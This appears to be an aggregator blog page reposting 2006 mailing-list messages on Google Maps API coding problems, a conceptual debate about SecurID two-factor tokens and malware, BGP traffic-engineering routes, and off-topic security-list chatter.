I don't see an infoWindowAnchor definition for the stationIcon...

-- Larry

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on 09-Sep-2006 at 11:54 PM.

I have just started playing around with the mapping capabilities of
Google and I built a webpage dynamically from a small table (usually
less than 150 records). If I only include 10 records the performace of
the table is ok. If I go above that it is a pig.

Would someone look at the pages and tell me why it is such a pig?

Thanks,

John

http://www.shelbynet.com/testgoogle5.htm
Loads 5 icons

http://www.shelbynet.com/testgoogle15.htm
loads 15 icons

http://www.shelbynet.com/testgoogle30.htm
Loads 30 icons

I'm not even going to try more .

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:47 PM.

http://maps.dtcurrie.net/boston

If you show any subway route, any of the gray dots (stations) should
pop up an info window. Here's the .js file that actually contains the
code in question:

http://maps.dtcurrie.net/maps.js

geocodezip@gmail.com wrote:
> Link?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:41 PM.

Link?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:35 PM.

if i used a local array, whn i search for the keyword that i want, how
would it focus on that splace marker and make the baloon with info
appear?

Greg

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:18 PM.

On 9/9/06, Lyal Collins <lyal.collins@key2it.com.au> wrote:
> If there's malware on the machine, and there is a connected USB token, then
> authentication is only as good as the password - malware can probe the
> connected token as often as desired.
<snip>
> In theory, with trusted data paths everywhere (internal to worksation as
> well as he network) OTP is better than passwords alone. But since this data
> patch assumption is rarely 100% valid, OTP is as good as a password alone.
> In the situation where data paths are trust-able, OTP is a somewhat better
> than passwords alone.

If you think about it in terms of how long an attacker has to act, I
think you'll come to a different conclusion. Two-factor auth is
better than password alone even when the end user is typing OTPs into
a machine that is completely and totally rooted. The key phrase in
your analysis is "connected token." Once the token is disconnected,
the malware no longer has access to the authentication data. When a
password is stolen it could be usable for months. When an OTP is
stolen it is usable for hours, if that. Two-factor auth reduces the
risk because it reduces the length of time of the compromise.

> Does the risk justify the costs involved (tokens,
> token management, authentication host, and trusted data paths)?

That is the big question. Even if you are willing to pay for
two-factor, transactional authentication might provide better value.

Regards,
Brian

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 9:43 PM.

This situation subverts BGP's basic loop prevention mechanism. If the
> /20 is ever deaggragated into more specifics, a forwarding loop may
> result.
>
> If you want to put rounds in the chamber before pointing the muzzle at
> your temple, you're free to do so. However, some of us would prefer to
> stand a long way away.

It seems to me that this is only true if there is ever a possibility of one
of your next-hops believing the route to the destination is back through
you - or perhaps if the upstream has no route at all to the destination. In
the case of most non-tier-1 networks, any packet destined for anywhere
outside my own ASN (and customer ASNs if you have BGP customers - which I do
not) can be handed to any upstream transit provider without fear of looping.

So, the device injecting the traffic engineering route needs to be smart
enough to never inject a route that matches an announcement of you or your
customers. Beyond that, looping (should) never happen simply by definition
of the transit/customer relationship.

So, it subverts BGP's loop detection - but the transit/customer relationship
(hopefully combined with appropriate announcement filtering) avoids the
issue. Of course, if you leak one transit provider to another, and that
gets accepted, you might loop due to your traffic engineering routes - but
at that point you've got plenty of problems anyway.

0 Comments Published by Search on at 8:40 PM.

I have the following code:

var b = 0;
while(b < routePoints.length)
{
var stationMarker = new GMarker(routePoints[b], {icon: stationIcon,
clickable: true});
map.addOverlay(stationMarker);
visible.push(stationMarker);

GEvent.addListener(stationMarker, "click", function()
{
stationMarker.openInfoWindowHtml("station marker");
});

++b;
}

routePoints is an array of GPoints that represents a route on my map.
The stationMarkers are all correctly rendered and are clickable. I
have other portions of my web app that correctly open info windows
based on click GEvents, so I'm quite sure that all of that works
correctly on my page.

Anyone see any obvious errors in my code? Thanks in advance.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 8:27 PM.

Wanting to stick with the documented API is quite understandable. In
the end though we couldn't use add/removeOverlay because the
lost-mouseout side effect is unacceptable. With add/removeOverlay the
highlight icons are never removed, so they "pile up" on your map. With
show/hide, the icon just stays highlighted until it is mouseover'd
again at which time it "fixes" itself.

I'm looking into fixing the missed mouseout events - I'll post my fix
(or hack) for them here.

Mike.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 8:17 PM.

>> Through a series of events too complex to detail, I will *not* be in
>> Edison, NJ, this week, but, rather in Ottawa. Anybody wanna get
>> together?
> Via one very simple event, I will be in Chesham, and I shall get
> together.

I'm in Ottawa most weekends (almost exactly three out of four, in fact,
the fourth being when I'm on weekend call at work), and if any of you
people are around, I'd be up for a little something.

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 7:44 PM.

If there's malware on the machine, and there is a connected USB token, then
authentication is only as good as the password - malware can probe the
connected token as often as desired.
And this data stream to the authentication host is still subject to a
variety of MITM attacks.

In the event of an unconnected OTP token, a variety of MITM attacks still
applies to OTP tokens - in the SecurID-style form factor, printed lists or
anything similar.

In theory, with trusted data paths everywhere (internal to worksation as
well as he network) OTP is better than passwords alone. But since this data
patch assumption is rarely 100% valid, OTP is as good as a password alone.
In the situation where data paths are trust-able, OTP is a somewhat better
than passwords alone. Does the risk justify the costs involved (tokens,
token management, authentication host, and trusted data paths)?

Lyal

-----Original Message-----
From: full-disclosure-bounces@lists.grok.org.uk
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Bojan Zdrnja
Sent: Sunday, 10 September 2006 8:51 AM
To: 3APA3A
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Re: RSA SecurID SID800 Token vulnerable by design

On 9/9/06, 3APA3A <3APA3A@security.nnov.ru> wrote:
> Dear Hadmut Danisch,
>
> 2-factor authentication is not a way to protect against malware.

Well, it protects - the authentication process.

> SecurID authentication supports single sign-on technology. As a
> weak side of this technology, it means, if single account on any
> network host is compromised, this account is compromised in
> whole network, because any resource can be accessed from compromised
> host. An ability to read current key from device is required to
> support single sign-on.

It depends on the underlying SSO technology. In most cases today you have
web based SSO deployments which rely on a cookie. In this case, you don't
need to connect the token at all - all you have to do is login once and the
browser will take care of rest. As Brian noted in the following e-mail, if
an attacker can put a keylogger on your machine, he can certainly get the
cookie as well and use it.

> The only additional attack factor this issue creates is attacker
> can get _physical_ access to console with user's credentials _any
> time_ while user is logged in, while in case token can not be red
> (e.g. it's not plugged to USB) he can only access console short after
> user logs in to compromised host (while token is not changed).

No - the OTP can be used only once, so even if you manage to get both the
PIN/password and the OTP (remember, you need both to login) you can't use
that because the RSA authentication manager (the server side of the whole
process) marked that OTP as used.

In this case an attacker can only try to brute force the OTP (after all,
it's only 6 digits), but RSA has excellent measures against brute force
attacks (basically, after a certain, configurable, number of unsuccessful
logins the token is disabled; what's even better is that it tracks number of
incorrect OTPs with correct PINs - if that is higher than a certain number,
it puts the token into "2nd OTP mode" which means you have to guess 2 OTPs
in a row).

I think these tokens offer excellent means for authentication. Sure, they
are not a silver bullet and don't solve all your security problems (nothing
does), but if you have users who have to login from a lot of insecure places
(airport lounges, cyber caffes) and are afraid of keyloggers stealing
passwords, two factor authentication really helps.

Cheers,

Bojan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 7:43 PM.

> What you see in BGP is not necessarily what you get for
> actual routing.
> This isn't the only situation where advertisements do not
> match actual
> routing. Consider traffic engineering systems such as the
> Internap FCP (old
> NetVMG). Imagine I have two upstreams (A and B) and you
> advertise a /20. I
> might prefer path A for your /20. However, my traffic
> engineering system
> may inject a no-export /24 route into my network to shift a
> portion of your
> traffic to go out my upstream B.
>
> This is quite interesting/confusing from the customer
> perspective, where you
> only see the BGP path through upstream A advertised, yet in
> reality a /24
> out of that /20 is going through a completely different path
> that you do not
> see via BGP.
>
> Is this wrong/evil? I guess that is up to each network to decide.

This situation subverts BGP's basic loop prevention mechanism. If the
/20 is ever deaggragated into more specifics, a forwarding loop may
result.

If you want to put rounds in the chamber before pointing the muzzle at
your temple, you're free to do so. However, some of us would prefer to
stand a long way away.

Tony

0 Comments Published by Search on at 7:14 PM.

Very new to this, I have a website about a state park in Florida and
I'd like to set up a map page where people could put in their own
address and get directions to the park. Is there code somewhere to set
that up?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 6:45 PM.

> Do providers really do this? Would they install multiple BGP Paths
> with different AS Paths (but same length) in their FIB, and yet
> advertise only one?
>
> Is the the right thing to do?

What you see in BGP is not necessarily what you get for actual routing.
This isn't the only situation where advertisements do not match actual
routing. Consider traffic engineering systems such as the Internap FCP (old
NetVMG). Imagine I have two upstreams (A and B) and you advertise a /20. I
might prefer path A for your /20. However, my traffic engineering system
may inject a no-export /24 route into my network to shift a portion of your
traffic to go out my upstream B.

This is quite interesting/confusing from the customer perspective, where you
only see the BGP path through upstream A advertised, yet in reality a /24
out of that /20 is going through a completely different path that you do not
see via BGP.

Is this wrong/evil? I guess that is up to each network to decide.

Disclaimer: I use such a system and have many /24 no-export routes in my
table. It works great and keeps my 7 upstream providers all nicely balanced
with no manual intervention ever. However, I have no BGP downstreams so the
above misrepresentation of BGP advertisements is not an issue since it never
leaves my network.

0 Comments Published by Search on at 6:30 PM.

http://video.google.co.uk/videoplay?docid=-5587990522549547050

--

regards
c0ntex

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 5:36 PM.

Another:

http://video.google.co.uk/videoplay?docid=-5702006622816922747

Makes me sick.

On 10/09/06, c0ntex <c0ntexb@gmail.com> wrote:
> http://video.google.co.uk/videoplay?docid=-5587990522549547050
>
> --
>
> regards
> c0ntex
>

--

regards
c0ntex

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 5:35 PM.

On 9/9/06, 3APA3A <3APA3A@security.nnov.ru> wrote:
> Dear Hadmut Danisch,
>
> 2-factor authentication is not a way to protect against malware.

Well, it protects - the authentication process.

> SecurID authentication supports single sign-on technology. As a weak
> side of this technology, it means, if single account on any network
> host is compromised, this account is compromised in whole network,
> because any resource can be accessed from compromised host. An ability
> to read current key from device is required to support single sign-on.

It depends on the underlying SSO technology. In most cases today you
have web based SSO deployments which rely on a cookie. In this case,
you don't need to connect the token at all - all you have to do is
login once and the browser will take care of rest. As Brian noted in
the following e-mail, if an attacker can put a keylogger on your
machine, he can certainly get the cookie as well and use it.

> The only additional attack factor this issue creates is attacker can
> get _physical_ access to console with user's credentials _any time_
> while user is logged in, while in case token can not be red (e.g. it's
> not plugged to USB) he can only access console short after user logs in
> to compromised host (while token is not changed).

No - the OTP can be used only once, so even if you manage to get both
the PIN/password and the OTP (remember, you need both to login) you
can't use that because the RSA authentication manager (the server side
of the whole process) marked that OTP as used.

In this case an attacker can only try to brute force the OTP (after
all, it's only 6 digits), but RSA has excellent measures against brute
force attacks (basically, after a certain, configurable, number of
unsuccessful logins the token is disabled; what's even better is that
it tracks number of incorrect OTPs with correct PINs - if that is
higher than a certain number, it puts the token into "2nd OTP mode"
which means you have to guess 2 OTPs in a row).

I think these tokens offer excellent means for authentication. Sure,
they are not a silver bullet and don't solve all your security
problems (nothing does), but if you have users who have to login from
a lot of insecure places (airport lounges, cyber caffes) and are
afraid of keyloggers stealing passwords, two factor authentication
really helps.

Cheers,

Bojan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 5:28 PM.

-- bmanning@vacation.karoshi.com wrote:

[snip]

>man I'd love to live in your universe... or are you suggesting
>that things have evolved in the last decade to the point that the
>ostensible goal of the IETF PIER wg can finally be met, to
>completely renumber the entire Internet every 20 minutes... :)

Man, I remember that vaguely. :-)

- ferg

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawg(at)netzero.net
ferg's tech blog: http://fergdawg.blogspot.com/

0 Comments Published by Search on at 5:16 PM.

Hi

I did make some changes last night - and it seemed to improved
functionality. Now Firefox works even faster (it seems) but it's still
like "watching grass grow" in IE 7 - are you saying performance looked
OK to you last night? If so I need to wonder whether its a combination
of local and internal issues.

Thanks B

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 5:12 PM.

Ok i think i solved my own problem. I used HTTP Analyzer and
discovered several .PNGs werent being loaded due to improper path. I
corrected it and now dragging and FF are ok.

d_henderson wrote:
> I'd make all the var's inside the constructor into properties, unless
> they are truly local to the constructor.
>
> I'd move all the methods outside the constructor and use something like
>
> Class.prototype.method = function(args){...};
>
> Add a
> Class.prototype = new Objects();
> to instantiate the prototype object for the class.
>
> Inside the methods, always use "this" to access the properties and
> methods of the object. Outside the class, use the object name to access
> all properties and methods. (One of my pet peeves is trying to figure
> out if ony given variable reference in c++ is a member, local or global
> variable.)
>
> This may sound very simplistic, but that is the a nature of interpreted
> dynamic typed languages. The complex and rigid structures of compiled
> languages are unnecessary.
>
> I use leading underscores in property and method names to flag that
> they are intended to be private. But that is a coding convention rather
> than a language feature.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 4:59 PM.

On Sat, 9 Sep 2006, Rob, grandpa of Ryan, Trevor, Devon & Hannah wrote:

> Through a series of events too complex to detail, I will *not* be in Edison, NJ,
> this week, but, rather in Ottawa. Anybody wanna get together?

Via one very simple event, I will be in Chesham, and I shall get together.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 3:37 PM.

Thanks Joel.

I'm not able to find the error at:
http://www.assuredperformancecare.com/showResults1.php

In the meantime, I've changed the request to v2.61a.

Any help from the community would be greatly appreciated. The markers
show up in Firefox but not in IE using > 2.62. I'm not able to find
the error in IE. - PW

Joel wrote:
> We released for a short period the v2.62 as the default, but went back to
> v2.61a due to something unrelated to the API.
>
> Pete, you may want to check your map against v=2.x now. The error may
> reappear because of a change in the API If there's an error in your code,
> the map may break because we no longer suppress JavaScript errors. This
> behavior won't change when we roll out the new version of the API. So, you
> have a couple of days to fix any problems on your end. Feel free to post a
> link to your map so others can help.
>
> Joel
>
> On 9/8/06, pete1978cali <petewarnock@gmail.com> wrote:
> >
> >
> > the problem I was having fixed itself shortly after I posted. Thanks
> > Google :)
> >
> >
> > >
> >
>
> ------=_Part_33385_3581160.1157747963917
> Content-Type: text/html; charset=ISO-8859-1
> X-Google-AttachSize: 994
>
> We released for a short period the v2.62 as the default, but went back to v2.61a due to something unrelated to the API.<br><br>Pete, you may want to check your map against v=2.x now. The error may reappear because of a change in the API If there's an error in your code, the map may break because we no longer suppress JavaScript errors. This behavior won't change when we roll out the new version of the API. So, you have a couple of days to fix any problems on your end. Feel free to post a link to your map so others can help.
> <br><br>Joel<br><br><div><span class="gmail_quote">On 9/8/06, <b class="gmail_sendername">pete1978cali</b> &lt;<a href="mailto:petewarnock@gmail.com">petewarnock@gmail.com</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
> <br>the problem I was having fixed itself shortly after I posted.&nbsp;&nbsp;Thanks<br>Google :)<br><br><br><br><br></blockquote></div><br>
>
> ------=_Part_33385_3581160.1157747963917--

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 3:36 PM.

From their webpage:
Service Advisory
On Aug. 17, 2006, the Boeing Company announced that a detailed business and market analysis of Connexion by Boeing is complete, and
the company has decided to exit the high-speed broadband communications connectivity markets. Boeing will work with its customers to
facilitate an orderly phase out of the Connexion by Boeing service. Passengers traveling on Internet-equipped flights will be able
to use the service until it is phased out between now and the end of the year, depending on the airline.

----- Original Message -----
From: "Joe Provo" <nanog-post@rsuc.gweep.net>
To: "Hank Nussbacher" <hank@efes.iucc.ac.il>
Cc: <cidr-report@potaroo.net>; <nanog@merit.edu>; <routing-wg@ripe.net>
Sent: Friday, September 08, 2006 6:35 AM
Subject: Re: [routing-wg]BGP Update Report

>
> On Fri, Sep 08, 2006 at 05:57:10PM +0300, Hank Nussbacher wrote:
>>
>> On Fri, 8 Sep 2006, cidr-report@potaroo.net wrote:
>>
>> Strike me as curious, but this seems as if Connexion by Boeing is handing
>> off a /24 from ASN to ASN as a certain plane moves over certain geographic
>> areas. Or is there some other explanation?
>
> Detailed at nanog 31 (among other meetings):
> http://www.nanog.org/mtg-0405/abarbanel.html
>
> 2005 detail from a blogger:
> http://bayosphere.com/node/879
>
> 2006 detail from another blogger:
> http://www.renesys.com/blog/2006/04/tracking_plane_flight_on_inter.shtml
>
> --
> RSUC / GweepNet / Spunk / FnB / Usenix / SAGE
>

0 Comments Published by Search on at 3:27 PM.

Hank Nussbacher wrote:

> And the same way that government forced telephone number portability, I
> foresee one day government requiring IP number portability among ISPs in
> order to increase competition. So all those SWIPS and PA assignments in
> ARIN/RIPE/APNIc may one day be used to allow Acme Nail with their /29
> assignment to leave ISP A and move to ISP B. Legislators have been
> known to make more idiotic laws and regulations so don't think it
> couldn't happen.

Customers already have portability. It's called DNS.

IP addresses aren't published in the big web rolodexes. They don't need
their IP address to stay with them.

pt

0 Comments Published by Search on at 2:16 PM.

Through a series of events too complex to detail, I will *not* be in Edison, NJ,
this week, but, rather in Ottawa. Anybody wanna get together?

====================== (quote inserted randomly by Pegasus Mailer)
rslade@vcn.bc.ca slade@victoria.tc.ca rslade@computercrime.org
Lately, the only thing keeping me from becoming a serial killer
is my distaste for manual labor - Dilbert, 1/7/01
Dictionary of Information Security www.syngress.com/catalog/?pid=4150
http://victoria.tc.ca/techrev/rms.htm
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 1:58 PM.

הממ ...
אני חוששת שאני בעיקר צריכה הסבר מה את רוצה..

אני משערת שאוכל לנסות לעזור - אני יודעת CSS לא רע.

ואני עדיין חייבת לך תיקון לרשימה בבר העליון של התבנית

Sarit wrote:

> שלום :)
> אני בדרך כלל מעדיפה להיות זו שעונה, אבל הפעם יש לי בקשה;
> יש פה מישהו שיודע CSS מספיק טוב כדי להפוף את התבנית newspaper לבעלת
> שלוש עמודות?
> http://themes.wordpress.net/columns/3-columns/850/newspaper-10
>
> אם אני אשחק עם זה, אני אהרוס, אני יודעת.
> תודה,
>
> >

--
Email: dakar2000@gmail.com
URL: http://www.dakars.info

--~--~---------~--~----~------------~-------~--~----~
אתה מקבל הודעה זו כיוון שאתה רשום ל קבוצת "Hebrew WordPress" בקבוצות גוגל.
כדי לכתוב לקבוצה זו, שלח הודעת דואר אלקטרוני אל wpheb@googlegroups.com
לביטול הרשמה מקבוצה זו, שלח דוא"ל ל wpheb-unsubscribe@googlegroups.com
לאפשרויות נוספות, בקר בקבוצה זו בhttp://groups.google.com/group/wpheb
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 1:13 PM.

I love your wag the dog style Ferg...Ryan (and the infamous KevinP) doesn't
do anything to verify the accuracy of the information received...he just
comments about how naughty the perpetrator was. Apparently he thinks that
divulging a personal e-mail is far more serious a crime than cheating on
one's wife, or using a work address to secure sexual partners (again,
assuming that any of the information is accurate).

And yea you got me....when I said WE, I really meant you. And when I said
you, I really only meant those who post other people's arguments rather than
forming their own.

-

StyleWar

"Forgiveness doesn't change the past; it unlocks the future."

> -----Original Message-----
> From: Fergie [mailto:fergdawg@netzero.net]
> Sent: Friday, September 08, 2006 11:46 PM
> To: stylewar@cox.net
> Cc: funsec@linuxbox.org
> Subject: RE: [funsec] Sex Baiting Prank on Craigslist Affects Hundreds
>
> -- "StyleWar" <stylewar@cox.net> wrote:
>
> >I think we're making an assumption that any of the information he
> >collected was in fact accurate.
>
> I think you speak for yourself.
>
> I, on the othe rhand, will allow Ryan Singel to speak for me:
>
> http://blog.wired.com/27BStroke6/index.blog?entry_id=1553329
>
> Enjoy.
>
> - ferg
>
>
>

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 12:56 PM.

Thanks for your responses. I have tried a few variations of

GEvent.addListener(map, "maptypechanged", function() {
map.removeTlabel(label1);
map.removeTlabel(label2);
});

...and so on, but still nothing. Sorry not to have posted a link ot my
map last time. Here is is here...

http://www.thesavagefiles.com/gmaps/whitsundays.htm

There's another small bug with that map (isn't there always?) When you
first open it, all the icons/ labels are offest lower than they should
be, by maybe twenty or thirty pixels. But when you 'refresh' the page,
they all move into place perfectly. Obviously, it's something I need to
fix, but wouldn't know where to start.

Cheers,
Steve

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 12:23 PM.

So at work (BigFix), we still have a number of customers using NT4 and
Win9x. NT4 is still used a lot in our financials vertical, and most of
them have the contract NT4 patches still from Microsoft. We also find
that Win9x is still big in Asia/Pac Rim. Most of our 9x support
questions come from there.

Our stuff is systems management software, agent-based. So while the
backend is Win2K+, the agents go back to Win95 and NT4.

So far, we've been able to keep a single Windows agent. We have to take
care to check OS version, and only load some DLLs at runtime, etc...

The potential upcoming barriers are Vista, which has somewhat changed
the UI model, and I believe the newest MS compiler is supposed to be
dropping support for the oldest OSes.

BB
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 12:06 PM.

Yes, that helps a great deal, and is fantastic news for us back at
website headquarters !

Thank You.

Robin

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:29 AM.

On Friday 08 September 2006 19:36, Rick Kunkel wrote:
> Heya folks,
>
> I hope this is on-topic. I read the charter, and it falls somewhere along
> the fuzzy border I think...
>
> Can anyone tell me the standard way to deal with patch panels, racks...

As many have mentioned here, TIA/EIA-942 is a good starting point. There are a
couple of good Data Centers books out there, also (a visit to your local
Borders or B&N could allow for an interesting afternoon browsing). I have
personally had positive experience with some docs and advice from some folks
with expertise in cable management and data centers infrastructure:

http://www.panduit.com/enabling_technologies/091903.asp

HTH,
Stefan

0 Comments Published by Search on at 11:16 AM.

On Fri, 8 Sep 2006, Tony Li wrote:

And the same way that government forced telephone number portability, I
foresee one day government requiring IP number portability among ISPs in
order to increase competition. So all those SWIPS and PA assignments in
ARIN/RIPE/APNIc may one day be used to allow Acme Nail with their /29
assignment to leave ISP A and move to ISP B. Legislators have been known
to make more idiotic laws and regulations so don't think it couldn't
happen.

-Hank Nussbacher
http://www.interall.co.il

> Another somewhat important point is that we also need to conserve
> routing entries. If you make a market for addresses without regard to
> routability, you risk creating a situation where you flood the world
> with /32's. No thanks.
>
> Tony

0 Comments Published by Search on at 10:57 AM.

There's a difference between paying to appear [have a marker] on the
map and paying to use [ie play with, zoom, pan etc] the map.

There's no problem with asking people to pay you to advertise their
position on your map. There is a problem with asking for money to view
those positions.

Does that help?

Andrew

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:32 AM.

On September 8, 2006 at 16:28 fergdawg@netzero.net (Fergie) wrote:
>
> I like how Jack Bates framed it: The IP address space is a "community
> asset" and as such, the allocation of it needs to be done in a way
> which serves & benefits the Internet community at-large.
>

Which would form a strong analogy to the FCC's original legal
justification for existence in 1934 which was that the radio spectrum
is a limited, public trust and as such the FCC is given the power to
regulate it and its contents in the public's interest (and, hence, to
regulate content in "the public interest".)

I would be very careful what I wish for.

Fortunately IPv6 could be a counter-balance to any claims of
jurisdiction based on limited address space though perhaps the camel's
nose will get into the tent first; in theory all address space is
finite, even if vast.

It's hard to imagine power over content achieved based on IPv4's
limited address space would be later yielded for IPv6 any more than
the tiny spectrum space of 1934 was ever yielded due to the vast
expansion of spectrum afforded by subsequent improved technology.

--
-Barry Shein

The World | bzs@TheWorld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: 800-THE-WRLD | Login: Nationwide
Software Tool & Die | Public Access Internet | SINCE 1989 *oo*

0 Comments Published by Search on at 10:11 AM.

On September 8, 2006 at 09:06 matt@snark.net (Matt Ghali) wrote:
>
> People who use the courts as a way to bleed their targets like this
> are vermin. Not surprising at all that this is all about some
> domain-squatting nonsense.

If a lawyer, any lawyer, sits you down in his office, looks you square
in the eyes, and says "Don't let them get away with that!" my advice
is leap up and run as if you are running for your life because indeed
you are. A client's moral outrage and lust for revenge are an
attorney's stock-in-trade.

--
-Barry Shein

The World | bzs@TheWorld.com | http://www.TheWorld.com
Purveyors to the Trade | Voice: 800-THE-WRLD | Login: Nationwide
Software Tool & Die | Public Access Internet | SINCE 1989 *oo*

0 Comments Published by Search on at 9:46 AM.

[Full-Disclosure] Mailing List Charter
John Cartwright <johnc@grok.org.uk>

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion. The list is
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

